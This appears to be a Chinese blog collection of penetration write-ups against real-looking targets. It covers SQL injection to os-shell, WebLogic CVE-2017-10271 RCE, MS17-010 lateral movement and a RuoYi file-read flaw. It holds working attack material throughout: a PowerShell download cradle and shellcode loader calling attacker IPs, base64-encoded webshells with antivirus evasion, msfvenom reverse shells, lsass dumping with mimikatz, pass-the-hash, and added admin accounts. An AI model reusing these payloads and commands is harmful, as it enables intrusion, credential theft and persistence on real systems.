```http
POST /Login/ValidateLogin HTTP/1.1
Host: x.53.172.x:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36

userName=admin*&password=admin123
```
已知存在sql注入

`python .\sqlmap.py -r .\1.txt --dbms=mssql  --batch  --os-shell --threads 10 --force-ssl` 交给sqlmap
### 艰难上线
进入![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0a9eea02a39a10430b4457a1fb1a7242.png)
希望上线到CS或获取稳定的Webshell
#### 1.powershell上线   
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/4f5f2edfcadfa21b3a63a542ee4305a5.png)
运行
`powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('[http://142.171.34.13:22251/x'))"](http://142.171.34.13:22251/x'))")`
X 失败（预测杀软拦截，可能流量和进程两个方向的拦截）
#### 2.获取web目录写webshell
`wmic logicaldisk get name`获取所有磁盘
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/78ce99bc311430c6c3e9e2f695809693.png)
/login_bg.png
找到某特征文件，`dir /s /p d:\login_bg.png` 全盘搜索
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/879740aefbbe3dbefa024b53f54875a0.png)
获得根目录，猜测BAK是备份文件夹
直接执行
`echo ^<%eval request("chopper")%^> > 'd:\Website\admin\Content\images/2.aspx'`
失败
`echo ^<%eval request("chopper")%^> > 'd:\Website\admin\Content\images/2.txt'`
成功
猜测是写入一句话过于敏感被杀软拦截
#### 3.上传免杀木马，通过os-shell运行
`python .\sqlmap.py -r .\1.txt --dbms=mssql  --batch --file-write  "C:/Penetration/ShellTools/Behinder/Behinder_v3.0_Beta_11/server/shell.aspx" --file-dest "d:/Website/admin/Content/images/2.aspx" -v1 --force-ssl`
尝试传免杀webshell
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/25055946d8da8f3469eab23516335d11.png)
上传失败，猜测同样被杀软拦截了
陷入僵局

#### 成功方法：
#### 1.certutil绕过
通过写入base64加密的asp然后通过certutil解密
```bash
echo PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiAlPgo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiPgogICAgcHVibGljIHN0YXRpYyBieXRlW10gdW5IZXgoYnl0ZVtdIGhleFN0cmluZyl7Ynl0ZVtdIGIgPSBuZXcgYnl0ZVtoZXhTdHJpbmcuTGVuZ3RoIC8gMl07Ynl0ZSBjO2ZvcihpbnQgaSA9IDA7IGkgPCBoZXhTdHJpbmcuTGVuZ3RoIC8gMjsgaSsrKXtjID0gaGV4U3RyaW5nW2kgKiAyXTtiW2ldID0oYnl0ZSkoKGMgPCAweDQwID8gYyAtIDB4MzAgOihjIDwgMHg0NyA/IGMgLSAweDM3IDogYyAtIDB4NTcpKTw8IDQpO2MgPSBoZXhTdHJpbmdbaSAqIDIgKyAxXTtiW2ldICs9KGJ5dGUpKGMgPCAweDQwID8gYyAtIDB4MzAgOihjIDwgMHg0NyA/IGMgLSAweDM3IDogYyAtIDB4NTcpKTt9cmV0dXJuIGI7fXB1YmxpYyBzdGF0aWMgYnl0ZVtdIGFlczEyOChieXRlW10gYnl0ZXMsaW50IG1vZGUpe1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuUmlqbmRhZWxNYW5hZ2VkIGFlcyA9IG5ldyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlJpam5kYWVsTWFuYWdlZCgpO2Flcy5QYWRkaW5nID0gU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZS5QS0NTNzthZXMuS2V5ID0gQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKCIwSjVZTTBmS2dZVnJtTWt3VFVJRitRPT0iKTthZXMuTW9kZSA9IFN5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZS5FQ0I7U3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5JQ3J5cHRvVHJhbnNmb3JtIHRyYW5zZm9ybSA9IG1vZGUgPT0gMSA/IGFlcy5DcmVhdGVFbmNyeXB0b3IoKTogYWVzLkNyZWF0ZURlY3J5cHRvcigpO3JldHVybiB0cmFuc2Zvcm0uVHJhbnNmb3JtRmluYWxCbG9jayhieXRlcywgMCwgYnl0ZXMuTGVuZ3RoKTt9cHVibGljIHN0YXRpYyBieXRlW10geG9yKGJ5dGVbXSBkYXRhKXtieXRlW10ga2V5ID0gQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKCJSODRzaCs2dUo5b1hKcE1mdzJwYy9RPT0iKTtpbnQgbGVuID0gZGF0YS5MZW5ndGg7aW50IGtleUxlbiA9IGtleS5MZW5ndGg7aW50IGluZGV4ID0gMDtmb3IoaW50IGkgPSAxOyBpIDw9IGxlbjsgaSsrKXtpbmRleCA9IGkgLSAxO2RhdGFbaW5kZXhdID0oYnl0ZSkoZGF0YVtpbmRleF0gXiBrZXlbKGkgJSBrZXlMZW4pXSk7fXJldHVybiBkYXRhO30KICAgIHByb3RlY3RlZCB2b2lkIFBhZ2VfTG9hZChvYmplY3Qgc2VuZGVyLCBFdmVudEFyZ3MgZSkKICAgIHsKICAgICAgICAKICAgICAgICB0cnkgewogICAgICAgICAgICAKICAgICAgICAgICAgYnl0ZVtdIHJlcXVlc3REYXRhID0gUmVxdWVzdC5CaW5hcnlSZWFkKFJlcXVlc3QuQ29udGVudExlbmd0aCk7Ynl0ZVtdIF9yZXF1ZXN0RGF0YSA9IG5ldyBieXRlW3JlcXVlc3REYXRhLkxlbmd0aCAtIDExMl07QXJyYXkuQ29weShyZXF1ZXN0RGF0YSwxMTAsX3JlcXVlc3REYXRhLDAsX3JlcXVlc3REYXRhLkxlbmd0aCk7cmVxdWVzdERhdGEgPSBfcmVxdWVzdERhdGE7CiAgICAgICAgICAgIHJlcXVlc3REYXRhID0gdW5IZXgocmVxdWVzdERhdGEpO3JlcXVlc3REYXRhID0gYWVzMTI4KHJlcXVlc3REYXRhLCAyKTsKICAgICAgICAgICAgaWYgKEFwcGxpY2F0aW9uWyJMbURKbGUiXSA9PSBudWxsKSB7CiAgICAgICAgICAgICAgICBBcHBsaWNhdGlvblsiTG1ESmxlIl0gPSAoU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkpdHlwZW9mKFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5KS5HZXRNZXRob2QoIkxvYWQiLAogICAgICAgICAgICAgICAgICAgIG5ldyBTeXN0ZW0uVHlwZVtdIHsKICAgICAgICAgICAgICAgICAgICAgICAgdHlwZW9mIChieXRlW10pCiAgICAgICAgICAgICAgICAgICAgfSkuSW52b2tlKG51bGwsIG5ldyBvYmplY3RbXSB7CiAgICAgICAgICAgICAgICAgICAgcmVxdWVzdERhdGEKICAgICAgICAgICAgICAgIH0pOwogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgU3lzdGVtLklPLk1lbW9yeVN0cmVhbSBtZW1vcnlTdHJlYW0gPSBuZXcgU3lzdGVtLklPLk1lbW9yeVN0cmVhbSgpOwogICAgICAgICAgICAgICAgU3lzdGVtLklPLkJpbmFyeVdyaXRlciBhcnJPdXQgPSBuZXcgU3lzdGVtLklPLkJpbmFyeVdyaXRlcihtZW1vcnlTdHJlYW0pOwogICAgICAgICAgICAgICAgb2JqZWN0IG8gPSAoKFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5KSAgQXBwbGljYXRpb25bIkxtREpsZSJdKS5DcmVhdGVJbnN0YW5jZSgiTFkiKTsKICAgICAgICAgICAgICAgIG8uRXF1YWxzKHJlcXVlc3REYXRhKTsKICAgICAgICAgICAgICAgIG8uRXF1YWxzKG1lbW9yeVN0cmVhbSk7CiAgICAgICAgICAgICAgICBvLlRvU3RyaW5nKCk7CiAgICAgICAgICAgICAgICBieXRlW10gcmVzcG9uc2VEYXRhID0gbWVtb3J5U3RyZWFtLlRvQXJyYXkoKTsKICAgICAgICAgICAgICAgIG1lbW9yeVN0cmVhbS5TZXRMZW5ndGgoMCk7CiAgICAgICAgICAgICAgICByZXNwb25zZURhdGEgPSB4b3IocmVzcG9uc2VEYXRhKTtyZXNwb25zZURhdGEgPSBTeXN0ZW0uVGV4dC5FbmNvZGluZy5EZWZhdWx0LkdldEJ5dGVzKENvbnZlcnQuVG9CYXNlNjRTdHJpbmcocmVzcG9uc2VEYXRhKSk7CiAgICAgICAgICAgICAgICBhcnJPdXQuV3JpdGUoQ29udmVydC5Gcm9tQmFzZTY0U3RyaW5nKCJleUpqYjJSbElqb3dMQ0prWVhSaElqcDdJbk4xWjJkbGMzUkpkR1Z0Y3lJNlcxMHNJbWRzYjJKaGJDSTZJbVV4U2xSUldEQndXZz09IikpO2Fyck91dC5Xcml0ZShyZXNwb25zZURhdGEpO2Fyck91dC5Xcml0ZShDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoIklpd2laWGhFWVhSaElqcDdJbUZ3YVY5bWJHOTNNREVpT2lJd0lpd2lZWEJwWDJac2IzY3dNaUk2SWpBaUxDSmhjR2xmWm14dmR6QXpJam9pTVNJc0ltRndhVjltYkc5M01EUWlPaUl3SWl3aVlYQnBYMlpzYjNjd05TSTZJakFpTENKaGNHbGZabXh2ZHpBMklqb2lNQ0lzSW1Gd2FWOW1iRzkzTURjaU9pSXdJaXdpWVhCcFgzUmhaeUk2SWpJaUxDSnNiMk5oYkY5amFYUjVhV1FpT2lJdE1TSjlmWDA9IikpO3Jlc3BvbnNlRGF0YSA9IG1lbW9yeVN0cmVhbS5Ub0FycmF5KCk7UmVzcG9uc2UuU3RhdHVzQ29kZSA9IDIwMDtSZXNwb25zZS5BZGRIZWFkZXIoIkNvbnRlbnQtVHlwZSIsImFwcGxpY2F0aW9uL2pzb24iKTtSZXNwb25zZS5CaW5hcnlXcml0ZShyZXNwb25zZURhdGEpOwoKICAgICAgICAgICAgfQogICAgICAgIH0gY2F0Y2ggKFN5c3RlbS5FeGNlcHRpb24pIHsKCiAgICAgICAgfQogICAgICAgIAogICAgfQoKPC9zY3JpcHQ+Cg== > D:/Website/admin/Content/images/t.asp
```
certutil -decode "D:/Website/admin/Content/images/t.asp" "D:/Website/admin/Content/images/s.aspx"

![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/5685473c57211190efc039ef6a18b039.png)

连接成功
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b8f30a24400e6bdd7a94264c0202146b.png)
最后上线发现全部都是被defender拦截了
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/16f793dfa6d0fe3cad29c5db8590bfcc.png)

此时iis的权限，上传免杀马成功，但是2分钟后被杀，无法再上传。
此时方向：
1.上传更强的免杀  X能力不足
2.kill av  X被杀 
3.defender 加白  X失败 权限太低
4.哥斯拉的shellcodeloader加载  X失败 原因未知（**shellcode 要删除\x部分才能加载**）
#### 2. ASPX内存执行shellcode,绕过Windows Defender（AV/EDR）（严重注意.ashx不能使用会导致崩站）
通过该下面[https://github.com/INotGreen/Webshell-loader](https://github.com/INotGreen/Webshell-loader)
上传Bypass.aspx，访问
`[https://x.53.172.x2:8080/Content/images/bypass.aspx?shellcodeURL=http://下x.x.x.x/download/](https://192.53.172.222:8080/Content/images/bypass.aspx?shellcodeURL=http://142.171.34.13:22251/download/file.ext)fxxx`
[http://142.171.34.13:22251/download/fxxx](http://142.171.34.13:22251/download/fxxx)
成功上线
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/28b7855eaed1fb9abf27b90b04b5bcd3.png)

[h](http://172.245.17.142:22251/download/file.ext)
### 后渗透提权：
##### 使用Bad[Potato](https://github.com/BeichenDream/GodPotato)提权至Sytem
期间因为未知原因，在CS上无法使用Bad[Potato](https://github.com/BeichenDream/GodPotato)，后利用他人CS的Bad[Potato](https://github.com/BeichenDream/GodPotato)提权成功
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/369ed15a4996993997f7ca099eb788ed.png)

猜测原因：服务器问题，profile文件问题，caddy反代
miks等cs插件运行逻辑:生成傀儡子进程，将miks注入到内存，不是自注入
##### 其他方法：
使用哥斯拉的内存加载BadPotato进行利用（Badpotato无法落地）
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/71818a296e0a1a12ece8f70e4d5fbe18.png)
或使用donut.exe生成shellcode格式，进行内存加载



两个问题：
1.cs的badpoto无法使用
2.exe转shellcode如何使用



后续推荐针对Sqlserver数据库的os-shell的增强利用工具：[Sqlmapxplus](https://github.com/co01cat/SqlmapXPlus)

记一次SQL注入的艰难getshell

目标:180.43.xxx.37
存在 CVE-2017-10271  漏洞


![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0cde8bce1e22c932b3ae771807ded8c5.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/a42458716473d9230cbab389150c5188.png)
```abap
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 180.43.xxx.37
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext
            xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                        <string><![CDATA[ 
                      nslookup `whoami`.po9.eyes.sh
                        ]]></string> </void>
                    </array>
                    <void method="start"/></void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

```
代码中`<![CDATA[恶意代码]]>`可以防止xml解析恶意代码导致命令执行失败
由于该机器不出网
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/3c7ab4967c22c89f3ce0ff82176f28f5.png)
虽然能够命令执行，但是无法远程下载文件，而且一般的weblogic工具无法直接利用，上传webshell和内存马
此时陷入僵局
通过大佬的建议，寻找到了dns的命令执行回显工具
[https://github.com/A0WaQ4/HexDnsEchoT](https://github.com/A0WaQ4/HexDnsEchoT)
`python3 HexDnsEchoT.py -d wemxjs.ceye.io -t 0346c416f8ffb87c8261efcb1e626282`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/89bf8ef044c15f5acd66bcbadd72ee1a.png)
思路：
既然不出网，也没办法直接注入内存马，寻找路径，手动写马
通过佩奇文库里面的poc
[https://peiqi.wgpsec.org/wiki/webserver/Weblogic/Weblogic%20XMLDecoder%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2017-10271.html](https://peiqi.wgpsec.org/wiki/webserver/Weblogic/Weblogic%20XMLDecoder%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2017-10271.html)
可知一般的weblogic写马目录路径如下（既命令执行的路径下的相对路径）
`servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp`
不修改路径的情况下，直接写马失败，404，因为路径9j4dqk部分是随机生成
使用dns回显工具探出回显
使用命令`find . -type d -name "bea_wls_internal" `寻找关键文件夹
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/3b9aa5c4230c4389cdd0dc955b677eed.png)
将python生成的命令替换进poc，等待dns回显
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/949480430e0574e165c175f81e264266.png)
可以看到存在两个bea_wls_internal文件夹
再分别使用命令 
`ls ./servers/ManagedServer01/tmp/_WL_internal/bea_wls_internal -R`
`ls ./servers/ManagedServer02/tmp/_WL_internal/bea_wls_internal -R`
获取到关键文件夹名称`t4zxy5`、`dvnmqm`
分别写入冰蝎马
```xml
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 180.43.xxx.37
Content-Type: text/xml
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope
    xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext
            xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.4.0" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                        <string><![CDATA[ 
                       echo  'PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7Lyror6Xlr4bpkqXkuLrov57mjqXlr4bnoIEzMuS9jW1kNeWAvOeahOWJjTE25L2N77yM6buY6K6k6L+e5o6l5a+G56CBcmViZXlvbmQqL3Nlc3Npb24ucHV0VmFsdWUoInUiLGspO0NpcGhlciBjPUNpcGhlci5nZXRJbnN0YW5jZSgiQUVTIik7Yy5pbml0KDIsbmV3IFNlY3JldEtleVNwZWMoay5nZXRCeXRlcygpLCJBRVMiKSk7bmV3IFUodGhpcy5nZXRDbGFzcygpLmdldENsYXNzTG9hZGVyKCkpLmcoYy5kb0ZpbmFsKG5ldyBzdW4ubWlzYy5CQVNFNjREZWNvZGVyKCkuZGVjb2RlQnVmZmVyKHJlcXVlc3QuZ2V0UmVhZGVyKCkucmVhZExpbmUoKSkpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7fSU+' | base64 --decode > ./servers/ManagedServer02/tmp/_WL_internal/bea_wls_internal/dvnmqm/war/1.jsp
                        ]]></string> </void>
                    </array>
                    <void method="start"/></void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

```
其中为防止echo出错，使用base64加解密如下
最后的绝对路径`/opt/Oracle/Middleware/user_projects/domains/base_domain/servers/ManagedServer02/tmp/_WL_internal/bea_wls_internal/dvnmqm/war/`
`echo 'base64_string' | base64 --decode > 1.jsp`
成功连接
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/8444dffa7ac080064b3530f3b88b29ad.png)

记一次不出网的weblojic-getshell

VPS: 172.2x.x.x
端口：8001
代理：suo5代理

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/add36ebd456f391c9dfca6005e5aa8cb.png)
附上Proxifer规则配置。10段的ip都走代理
![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/adab0da7f7ad8613cc828cd913d4fb89.jpeg)
通过webshell，利用msf生成木马
```
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.245.17.142 LPORT=8001 -a x86 --platform Linux -f elf > shell.elf
```
```
root@kali:~# msfconsole 
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
msf5 exploit(multi/handler) > set lport 444	4
msf5 exploit(multi/handler) > run
meterpreter > 
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/aa98b103a4cc8390c4935681b0f668ef.png)
使用getuid和sysinfo查看一下信息
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/f3fba136c052b53379f810d93ea063d2.png)

使用`backgroud`回到界面
使用模块，来添加路由
`use post/multi/manage/autorout`
`set session 2`
`exploit`
只有在添加路由后，才可以借助当前设备作为跳板来对其他服务器进行漏洞扫描了
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/ce9e8b91e269ae9ca6e3cdf5f8402241.png)
## 目标一：10.35.203.227 永恒之蓝
扫描ms17_010漏洞
`use auxiliary/scanner/smb/smb_ms17_010`
`set rhosts 10.35.203.227`
`run`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/cbadf2d3fec3fc4dffec4e53b6f53757.png)
可以看到存在漏洞
`use auxiliary/admin/smb/ms17_010_command`
`set rhost 10.35.203.227`
`set command whoami`
`run`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7ae8a2440c4ce23e51ba67867cf98a9e.png)
成功获取权限
使用以下命令进行正向连接
`use exploit/windows/smb/ms17_010_psexec`
`set payload windows/meterpreter/bind_tcp`
`set rhost 10.35.203.227`
`run`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b7ed1372e37a4bdcd945add60c10c0a0.png)
回显出hash，解密得到Administrator/ma5680t
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/9179f6ca19b928d1113aa9119e9af166.png)
通过`run post/windows/manage/enable_rdp`命令开启目标3389端口
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/6d3f053af75878d3c60ece9f45259e63.png)
远程连接成功
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/fc1b250d8345c703f32452da48a0deb0.png)


## 目标二：10.35.203.216 数据库弱口令
10.35.203.216 sa/P@ssw0rd
使用数据库利用工具添加用户
`clr_badpotato net user test Pass0822.. /add`
`clr_badpotato net localgroup Administrators test /add`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/0acaf8652cd2f7b16cfc8fd825a8fd6a.png)
test/Pass0822..
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/3a962888a213bdf60b03ee5d09ef5e33.png)
tasklist 可以看到目标有360
mimikatz上传既被杀，Procdump没被杀
考虑通过Procdump+Mimikatz离线读取lsass.dmp文件
> **Procdump是微软官方发布的工具，所以杀软不会拦截，其可以用来将目标lsass文件导出。下载地址：**[**https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump**](https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump)

**先用在目标机器上传微软的工具Procdump，导出其lsass.exe：**
```abap
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
```
将在目标机器上导出的lsass.dmp下载到本地后，执行mimikatz导出lsass.dmp里面的密码和hash：
```abap
sekurlsa::minidump 目录\lsass.dmp       // 将导出的lsass.dmp载入到mimikatz中
sekurlsa::logonpasswords full                 // 获取密码
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/04d1517ef18a5d26e4953c79d3260aa6.png)
目标hash如下
`3956bb5c470fafdb53f61810e3e6020d`
Cmd5解不出来，尝试使用hash传递
```abap
privilege::debug
sekurlsa::pth /user:administrator /domain:10.35.203.216:13389 /ntlm:3956bb5c470fafdb53f61810e3e6020d "/run:mstsc.exe /restrictedadmin"
```
遇到了以下麻烦
![1474079-20180828124253643-1758643131.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7cad7f8aa845efc910c62c08a9b8edeb.png)
修改本地计算机下面配置后成功连接目标
` gpedit.msc `计算机配置>管理模板>系统>凭据分配>加密Oracle修正  
![1474079-20180828124528127-1089319304.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/609b1dfb5925ce78179f013bfb710be7.png)
成功连接
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/91d2ddbb0998faf1e9205baddab0f0a4.png)

![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7ac9334a8e76bd36e3bf4728afc3509a.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/32845aee48efbf01c4e7b139801f44f2.png)
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/651be4450eecccb33605ce5c53a70ccb.png)

记一次linux内网探索 ms-17010

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/ae08be8c21d3a21a1c6ed15a613f049c.png)

查看源代码发现该网站可能是若依CMS
通过前台注册用户登录后台，测试发现后台存在文件读取漏洞

```
GET/zzadmin/common/download/resource?resource=/profile/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host:x.x.x.x
Cache-Control:max-age=0
Upgrade-Insecure-Requests:1
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64;x64)AppleWebKit/537.36(KHTML,like Gecko)Chrome/115.0.5790.110Safari/537.36
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=dca9f2db-0b4a-4cdc-8b7d-cdd2e848b569
Connection: close
```
![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/192e1c3ce8a335700eb0ad9c89239908.png)
```
/porc/self/cmdline//当前进程的cmdline参数
/proc/sched_debug 配置文件可以看到当前运行的进程并可以获得对应进程的pid
/proc/pid/cmdline 则可以看到对应pid进程的完整命令行。
/proc/net/fib_trie 内网IP
/proc/self/environ 环境变量
/proc/self/loginuid 当前用户
```
通过文件读取漏洞可以读取目标机器上的一些敏感文件，当然一般情况下首选.bash_history文件，但是由于目标站点可能存在防护导致无法读取，所以这里尝试读取若依的敏感配置文件`application.ym`l和`application-druid.yml`

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/92479d8ef4e5a8c951cc79f9b0e9c176.png)

[https://cnxiaobai.com/articles/2021/04/27/1619527685938.html](https://cnxiaobai.com/articles/2021/04/27/1619527685938.html)
而默认配置文件目录为
`/usr/local/tomcat/webapps/ruoyi-admin/WEB-INF/classes/application-druid.yml`
所以这里大致猜测一下网站的敏感目录为zzadmin/WEB-INF/classes/application-druid.yml，不过前面还需要webapp运行目录
我们首先获取java进程的pid
`/proc/sched_debug`
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/08d6eaec02db95d3e3204761806de11e.png)

然后获取java进程的完整命令行

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/134d3fbb260b249070ae4b05d73142a0.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b0997f002ee084020aa305a42c6f6b1e.png)

获取到webapp目录为/home/tongweb7/deployment，通过查看官方手册发现该目录为应用部署目录

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/559c724eddd54091ab8e343ff97d8265.png)

所以猜测zzadmin就在该目录下，所以进行拼接得到

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/88f2c55e073fbf3533b0481e1148134c.png)

通过读取application.yaml获取到shiro key

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/19333bed31a5837677bf263a7af02918.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/21245d60e57caa94d7be9338adf66d0c.png)

![](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/83cc6f111fcef069e04d6f85be60d744.png)

记一次若依文件读取漏洞

目标ip:x.x.x.x 阿里云服务器
某小程序利用文件上传拿到webshell，权限很低

![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/234cae4b78050c34aeb21a377d7f51be.png)
考虑提权
借用哥斯拉的反弹shell  ，使用msf来提权
```
root@kali:~# msfconsole 
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 0.0.0.0
msf5 exploit(multi/handler) > set lport 444	4
msf5 exploit(multi/handler) > run
meterpreter > 
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/7d3348615887c11d64358372dfb8dcf4.png)
getsystem  直接提权
getuid  查看当前权限
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/f5d167d8b04cf4c8d8a669cd7c2e91c1.png)
本来试图添加3389用户的
#### 添加用户
```abap
net user test Pass0822.. /add  添加用户名为name，密码为pass
net localgroup Administrators test /add  将用户名为uname的用户添加到管理员组
net user test /del 删除uname用户
```

可惜一直失败，猜测杀软拦截（后文有解释），试图抓取hash
使用msf的load kiwi 
```php
kiwi_cmd sekurlsa::logonpasswords
```
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/b97276b48bce4a7be51c4b17b72eadca.png)
试图解hash失败了，据说2008以上的服务器都无法直接获取明文密码，_这个时候其实就可以考虑使用msf获得的高权限来开启注册表，进行hash传递登陆_
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/f419400f24ad6503bc296ea71fc2720f.png)
尝试使用gotohttp上线
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/61e386ce5ad5a6cb668c850cd4bc360f.png)
发现仍然需要密码  ，失败

使用msf执行免杀的cs马上线成功，开启vnc 黑屏，两眼一黑
在CS重新尝试添加用户失败，回显发现是因为密码策略问题，为此绕了一大圈
![image.png](https://blog-1308722180.cos.ap-guangzhou.myqcloud.com/ae8b39a5a5eb9c81ce27ea55810855cc.png)
牢记
